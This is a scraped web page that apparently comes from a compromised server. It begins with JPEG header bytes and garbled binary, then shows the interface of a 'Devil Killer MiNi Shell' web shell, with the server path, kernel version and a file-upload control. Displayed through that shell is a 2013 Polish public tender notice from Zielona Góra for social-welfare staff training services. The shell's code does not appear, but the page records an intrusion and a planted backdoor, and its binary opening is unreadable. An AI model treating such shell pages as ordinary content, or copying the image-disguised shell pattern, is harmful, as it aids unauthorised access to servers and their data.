JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130416/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130416/149982-N-2013.html

<p class="kh_header"><b>Zielona Góra: Wykonanie kompleksowej usługi szkoleniowej  w zakresie organizacji szkoleń z podziałem na części: 1) Warsztaty specjalistyczne   2) System wspierania rodziny i pieczy zastępczej realizowanego w ramach projektu systemowego pn. Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskim.</b><br>
<b>Numer ogłoszenia: 149982 - 2013; data zamieszczenia: 16.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej , Al. Niepodległości 36, 65-042 Zielona Góra, woj. lubuskie, tel. 68 323 18 80, faks 68 352 39 54.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie kompleksowej usługi szkoleniowej  w zakresie organizacji szkoleń z podziałem na części: 1) Warsztaty specjalistyczne   2) System wspierania rodziny i pieczy zastępczej realizowanego w ramach projektu systemowego pn. Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie kompleksowej usługi szkoleniowej w zakresie organizacji szkoleń z podziałem na części1) Warsztaty specjalistyczne2) System wspierania rodziny  i pieczy zastępczej obejmującej:-organizację i przeprowadzenie szkoleń
-zapewnienie wyspecjalizowanej kadry dydaktycznej,
-zapewnienie zaplecza techniczno-organizacyjnego szkoleń,
-przygotowanie materiałów szkoleniowych, informacyjnych, 
-zapewnienie wyżywienia podczas szkoleń dla uczestników oraz 2 przedstawicieli 
Zamawiającego - obsługi technicznej biorących udział w szkoleniach,
-zapewnienie transportu na miejsce realizacji szkoleń oraz powrotnego dla uczestników szkoleń oraz 2 przedstawicieli Zamawiającego - obsługi technicznej, biorących udział w szkoleniach,
-zapewnienie zakwaterowania dla uczestników szkoleń oraz 2 przedstawicieli Zamawiającego obsługi technicznej biorących udział w szkoleniach,
-zapewnienie grupowego ubezpieczenia od następstw nieszczęśliwych wypadków 
dla uczestników szkoleń oraz  2 przedstawicieli Zamawiającego obsługi technicznej biorących udział w szkoleniach,
-szkolenie określone w pkt.10 ppkt.10.2, lit.d  może być zrealizowane tylko przez Wykonawcę, który posiada program zatwierdzony decyzją Ministra Pracy i Polityki Społecznej. Program musi zawierać ćwiczenia i treści dostosowujące go do ustawy z dnia 9 czerwca 2011 r. o wspieraniu rodziny i systemie pieczy zastępczej Dz.U. 2011 Nr 149 poz. 887 z póź. zm. Jednocześnie ukończenie tego szkolenia oraz otrzymanie certyfikatu będzie upoważniało uczestników do prowadzenia szkoleń dla rodzin zastępczych.
3.Wykonawca będzie zobowiązany do zapewnienia transportu dla uczestników szkolenia,z Zielonej Góry i Gorzowa Wielkopolskiego  do miejsca szkolenia i z powrotem:
4.Wykonawca zapewni sale odpowiadające standardom sal konferencyjno  szkoleniowych, przystosowane dla grup odbywających dane szkolenie. Sale te winny znajdować się w tym samym miejscu co hotel. 
5.Do obowiązków Wykonawcy organizującego i świadczącego usługę szkoleniową należeć będzie:
a)promocja usługi w ramach projektu pn.: Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskim na zasadzie rejestracji, jako instytucji szkoleniowej, w internetowej bazie ofert, dostępnej na stronie internetowej: www.inwestycjawkadry.info.pl i aktualizacji w powyższej bazie informacji o każdym szkoleniu otwartym, organizowanym w ramach przedmiotu zamówienia objętego Umową nie rzadziej niż raz w miesiącu:
b)realizacja usługi zgodnie z postanowieniem umowy, w tym zapewnienie m.in. trenerów z odpowiednim wykształceniem, umiejętnościami i doświadczeniem dostosowanym   do tematyki szkoleń,
c) w trakcie trwania szkoleń zabezpieczenie warunków pracy, zgodnie z przepisami bezpieczeństwa i higieny pracy.
6.Wybrany Wykonawca zobowiązany będzie do przedłożenia Zamawiającemu harmonogramu szkoleń wg wzoru otrzymanego od Zamawiającego. Harmonogram zobowiązany będzie przedłożyć Zamawiającemu w terminie 5 dni od dnia jego otrzymania. Harmonogramy szkoleń Wykonawca przygotuje uwzględniając czas i godziny trwania zajęć, przerwy obiadowe i kawowe oraz zakres merytoryczny szkoleń  wykazanych w rozdziale VIII punkcie 10, ppkt. 10.1 i 10.2 SIWZ.
7.Wybrany Wykonawca zobowiązany będzie do przedłożenia Zamawiającemu  Programu szkoleń wg wzoru otrzymanego od Zamawiającego. Program szkoleń Wykonawca  zobowiązany będzie przedłożyć Zamawiającemu w terminie 5 dni od dnia jego otrzymania. 
8.Szczegółowy opis przedmiotu zamówienia określa  załącznik nr 1 i 2 stanowiący integralną część do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.10.00.00-1, 70.22.00.00-9, 92.31.22.12-0, 55.30.00.00-3, 66.51.21.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 22.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium .
2.Warunkiem udziału w przetargu jest wniesienie wadium:
a)na Część I w wysokości  1 768,00 zł ( słownie : jeden tysiąc siedemset sześćdziesiąt osiem złotych 00/100)
b)na Cześć II  wysokości - 3 065,00 zł ( słownie: trzy tysiące sześćdziesiąt pięć złotych 00/100)
Gdy Wykonawca składa ofertę na całość przedmiotu zamówienia wymagane jest wadium w kwocie 
4 833,00 zł ( słownie cztery tysiące osiemset trzydzieści trzy złote  00 100)   
3.Termin wnoszenia wadium upływa w dniu składania ofert, tj.  25 kwietnia do godz. 10:00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku szkolenia określonego w pkt. 10 ppkt 10.2 lit d Wykonawca jest podmiotem uprawnionym do prowadzenia szkoleń na podstawie program u zatwierdzonego decyzją Ministra Pracy i Polityki Społecznej. Program musi zawierać ćwiczenia i treści dostosowujące go do ustawy z dnia 9 czerwca 2011 r. o wspieraniu rodziny zastępczej  i systemie pieczy zastępczej (Dz.U z 2011r. Nr 149,poz.887 ze zm.). Ukończenie tego szkolenia oraz otrzymanie zaświadczenia certyfikatu dyplomu będzie upoważniało uczestników do prowadzenia szkoleń dla rodzin zastępczych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnej wiedzy i doświadczenia  Zamawiający uzna wykonanie    w okresie ostatnich 3 lat, (a jeżeli okres prowadzenia jest krótszy - w tym okresie) przed upływem składania ofert:
 - dla części I -  Wykonawca zobowiązany jest wykazać 
- dwie usługi szkoleniowe tj. warsztaty, seminaria, konferencje o wartości każdej z nich nie mniejszej niż 35 000,00 zł brutto, z podaniem jej rodzaju daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zostały należycie wykonane zgodnie z załącznikiem 6 do SIWZ,
- dla Części II  - Wykonawca zobowiązany jest wykazać
-jedną  usługi w zakresie przeprowadzenia kursu, szkolenia, seminarium, warsztaty 
 o wartości  nie mniejszej niż 100 000,00  zł brutto, z podaniem jej rodzaju daty 
i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi 
te zostały należycie wykonane - zgodnie z załącznikiem 6a do SIWZ.
 - gdy Wykonawca  składa ofertę na cały przedmiot zamówienia zobowiązany jest wykazać się wykonaniem  trzech  usług w zakresie przeprowadzenia kursu, szkolenia, seminarium, warsztaty o wartości  nie mniejszej niż 170 000,00 zł brutto łącznie  z podaniem jej rodzaju daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zostały należycie wykonane- na spełnienie warunku  zobowiązany jest załączyć do oferty załącznik 6 i  lub  6a zgodnie z zapisami SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje  lub będzie dysponował do przeprowadzenia szkoleń minimum jedną osobą (trenerem) na każdą grupę szkoleniową która:
- posiada doświadczenie w prowadzenie szkoleń z zakresu tematycznego niniejszego postępowania (min. trzy szkolenia z danego tematu w przypadku każdego trenera na daną grupę) zgodnie z załącznikiem nr 7 do SIWZ, i lub 7a do SIWZ.

W przypadku szkolenia określonego w pkt.10 ppkt 2 lit. d musi ono w całości zostać prowadzone niezmiennie przez dwóch trenerów(kotrenerstwo). W tym wymagane jest, aby jeden z prowadzących był osoba która ma m.in. 2 letnie doświadczenie w prowadzeniu rodziny zastępczej.(UWAGA: Warunkowo Wykonawca może wykazać tą samą osobę - trenera,  jeśli posiada ona wymagane łączne doświadczenie z kilku tematów i nie koliduje to ze zbiegającymi się terminami szkoleń wykazanymi w rozdziale X, pkt 1 i 2  SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej, tj. posiadają ubezpieczenie odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę:
a) dla części I zamówienia -  100 000 zł;
b) dla części II zamówienia - 100 000 zł;
W przypadku składania oferty na dwie części należy zsumować ww. wartości i wykazać się posiadaniem ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (np. Wykonawca składa ofertę na cześć I i II - musi posiadać ubezpieczenie OC w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 200 000 zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Opis hotelu - zgodnie z załącznikiem nr 8 lub i 8a do SIWZ. 

Wypełniony i podpisany Formularz ofertowy - zgodnie z załącznikiem  nr 3 do SIWZ.
4.2 Pisemne zobowiązanie, o którym mowa w rozdziale XII pkt 2, ppkt 2.1 SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp - jeśli dotyczy. 
UWAGA: pisemne zobowiązanie należy złożyć w formie oryginału.
4.3 Pełnomocnictwo - jeśli dotyczy.
4.4 Projekt umowy - zgodnie z załącznikiem nr  9 do SIWZ. ( dla zadania części I)
4.5 Projekt umowy - zgodnie z załącznikiem nr 10 do SIWZ ( dla zadania części II) Projekt umowy  - zaleca się, aby Wykonawca dołączył do oferty  parafowany na każdej stronie   projekt  umowy). Nie załączenie do oferty ww. dokumentu nie będzie skutkowało odrzuceniem oferty.
4.6 Oświadczenie - zobowiązanie podmiotu oddającego do dyspozycji wykonawcy niezbędne zasoby
 - zgodnie z załącznikiem nr 11 lub i 11a do SIWZ.
4.7 Wzór - Wykaz zrealizowanych szkoleń  do oceny kryterium  w podkryterium A - wg. wzoru      załącznika 12 do SIWZ,
4.8 Wzór  - Wykaz zrealizowanych szkoleń  do oceny kryterium  w podkryterium B - wg. wzoru    załącznika 12a do SIWZ,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.1Zamawiający zastrzega sobie prawo wprowadzenia zmian do zawartej umowy z wybranym Wykonawcą w niniejszym postępowaniu, w przypadku wystąpienia niżej podanych okoliczności:
a)zmiany terminów realizacji zamówienia,
b)zmiany warunków płatności,
c)zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT,
d)zaistnienia omyłki rachunkowej lub pisarskiej,
e)zaistnienia siły wyższej (powódź, pożar, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy,
f)zmiany terminów szkoleń,
g)wystąpienia niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, o których strony nie wiedziały przed zawarciem umowy, a które mają wpływ na terminy realizacji zamówienia ( zmiany harmonogramu realizacji szkoleń),w razie zmiany liczby uczestników szkoleń w  tym zmiany liczby osób korzystających z noclegów,
h)zmiana osoby w realizacji przedmiotu zamówienia  ze względu na długotrwałe zwolnienie lekarskie, urlop lub inne przyczyny,  których nie można przewidzieć w dniu zawarcia umowy z zastrzeżeniem że musi on posiadać doświadczenie  zawodowe  nie gorsze niż wskazane 
w warunku  udziału w postępowaniu,
i)zmiana miejsca zakwaterowania  uczestników szkolenia (hotelu, ośrodka szkoleniowego) wskazanego w ofercie. Zmiana ta jest dopuszczalna tylko i wyłącznie w  sytuacji zaistnienia niemożliwej do przewidzenia  i nie dającej się  usunąć przeszkody, a nowe miejsca  posiadają  taki sam standard ( mogą posiadać wyższy)  jak został zaoferowany w ofercie.
1.2Wykonawca wnioskujący o zmianę umowy, przedkłada Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy. O wystąpieniu okoliczności mogących wpłynąć na zmianę umowy Wykonawca winien jest poinformować Zamawiającego pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.lubuskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zielona Góra, ul. Niepodległości 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2013 godzina 10:00, miejsce: Regionalny Ośrodek Polityki Społecznej  
w Zielonej Górze
65-042  Zielona Góra, al. Niepodległości 36
(sekretariat I piętro) pkój  nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa  współfinansowana ze środków Europejskiego Funduszu Społecznego (EFS)  w ramach Programu  Operacyjnego Kapitał Ludzki (PO KL), Priorytet VII Promocja integracji społecznej, Działanie 7.1Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej, w ramach projektu pn. Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskim.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztaty specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -organizację i przeprowadzenie szkoleń,
-zapewnienie wyspecjalizowanej kadry dydaktycznej,
-zapewnienie zaplecza techniczno-organizacyjnego szkoleń,
-przygotowanie materiałów szkoleniowych, informacyjnych, 
-zapewnienie wyżywienia podczas szkoleń dla uczestników oraz 2 przedstawicieli 
Zamawiającego - obsługi technicznej biorących udział w szkoleniach,
-zapewnienie transportu na miejsce realizacji szkoleń oraz powrotnego dla uczestników szkoleń oraz 2 przedstawicieli Zamawiającego - obsługi technicznej, biorących udział w szkoleniach,
-zapewnienie zakwaterowania dla uczestników szkoleń oraz 2 przedstawicieli Zamawiającego obsługi technicznej biorących udział w szkoleniach,
-zapewnienie grupowego ubezpieczenia od następstw nieszczęśliwych wypadków 
dla uczestników szkoleń oraz  2 przedstawicieli Zamawiającego obsługi technicznej biorących udział w szkoleniach,
-szkolenie określone w pkt.10 ppkt.10.2, lit.d  może być zrealizowane tylko przez Wykonawcę, który posiada program zatwierdzony decyzją Ministra Pracy i Polityki Społecznej. Program musi zawierać ćwiczenia i treści dostosowujące go do ustawy z dnia 9 czerwca 2011 r. o wspieraniu rodziny i systemie pieczy zastępczej (Dz.U. 2011 Nr 149 poz. 887 z póź. zm.) Jednocześnie ukończenie tego szkolenia oraz otrzymanie certyfikatu będzie upoważniało uczestników do prowadzenia szkoleń dla rodzin zastępczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.10.00.00-1, 70.22.00.00-9, 92.31.22.12-0, 55.30.00.00-3, 66.51.21.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 22.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. wykaz zrealizowanych szkoleń - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> System wspierania rodziny u pieczy zastępczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -organizację i przeprowadzenie szkoleń,
-zapewnienie wyspecjalizowanej kadry dydaktycznej,
-zapewnienie zaplecza techniczno-organizacyjnego szkoleń,
-przygotowanie materiałów szkoleniowych, informacyjnych, 
-zapewnienie wyżywienia podczas szkoleń dla uczestników oraz 2 przedstawicieli 
Zamawiającego - obsługi technicznej biorących udział w szkoleniach,
-zapewnienie transportu na miejsce realizacji szkoleń oraz powrotnego dla uczestników szkoleń oraz 2 przedstawicieli Zamawiającego - obsługi technicznej, biorących udział w szkoleniach,
-zapewnienie zakwaterowania dla uczestników szkoleń oraz 2 przedstawicieli Zamawiającego obsługi technicznej biorących udział w szkoleniach,
-zapewnienie grupowego ubezpieczenia od następstw nieszczęśliwych wypadków 
dla uczestników szkoleń oraz  2 przedstawicieli Zamawiającego obsługi technicznej biorących udział w szkoleniach,
-szkolenie określone w pkt.10 ppkt.10.2, lit.d  może być zrealizowane tylko przez Wykonawcę, który posiada program zatwierdzony decyzją Ministra Pracy i Polityki Społecznej. Program musi zawierać ćwiczenia i treści dostosowujące go do ustawy z dnia 9 czerwca 2011 r. o wspieraniu rodziny i systemie pieczy zastępczej (Dz.U. 2011 Nr 149 poz. 887 z póź. zm.) Jednocześnie ukończenie tego szkolenia oraz otrzymanie certyfikatu będzie upoważniało uczestników do prowadzenia szkoleń dla rodzin zastępczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.10.00.00-1, 70.22.00.00-9, 92.31.22.12-0, 55.30.00.00-3, 65.51.21.00-3.</p></li>
